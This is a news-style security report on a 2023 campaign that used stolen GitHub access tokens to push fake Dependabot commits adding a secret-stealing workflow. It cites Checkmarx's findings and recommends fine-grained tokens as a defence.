This campaign took place in July 2023 when researchers noticed unusual commits on numerous public and private repositories. These commits were cleverly crafted to appear as Dependabot commits.
Dependabot is an automated tool provided by GitHub that scans projects for vulnerable dependencies and automatically generates pull requests to update them.
According to a report by Checkmarx, the fake Dependabot contributions were made possible through stolen GitHub access tokens. The attackers aimed to inject malicious code into projects to retrieve the secrets of these projects.
Impersonating GitHub’s Dependabot
The attack began with the hackers somehow acquiring the personal GitHub access tokens of their targets, but Checkmarx does not have insight into how this was done.
The threat actors then utilized automated scripts to create fake commit messages titled “fix” under the user account “dependabot[bot].”
These fraudulent commits introduced malicious code into the project, performing the following actions:
- Extracting secrets from the targeted GitHub project and sending them to the attacker’s command and control server.
The secrets extraction is accomplished by adding the GitHub action file “hook.yml” as a new workflow that is triggered with every code push event on the affected repository.
Since many compromised tokens also provided access to private repositories, both public and private GitHub repositories were affected by this attack.
Possible compromise points
Checkmarx’s analysts examined the logs from some victims and discovered that their accounts were compromised through stolen PATs (personal access tokens).
These tokens are stored locally on the developers’ computers and allow them to log in to GitHub without going through the 2FA (two-factor authentication) process.
“Unfortunately, the token’s access log activity does not appear in the account’s audit log. Therefore, if your token has been compromised, you cannot be certain as the access logs are missing,” warns Checkmarx.
Although the cybersecurity firm has not reached a definitive conclusion regarding the exact means by which the attackers stole these tokens, they speculate that it might have been through a malware infection, possibly introduced to the developers’ devices via a malicious package.
Most of the compromised users are from Indonesia, suggesting a targeted attack tailored to this demographic. However, the available evidence does not provide specific details about the motive.
A suggested measure to protect against these attacks is to switch to GitHub’s fine-grained personal access tokens, which limit users to specific permissions, thereby reducing risks in the event of compromise.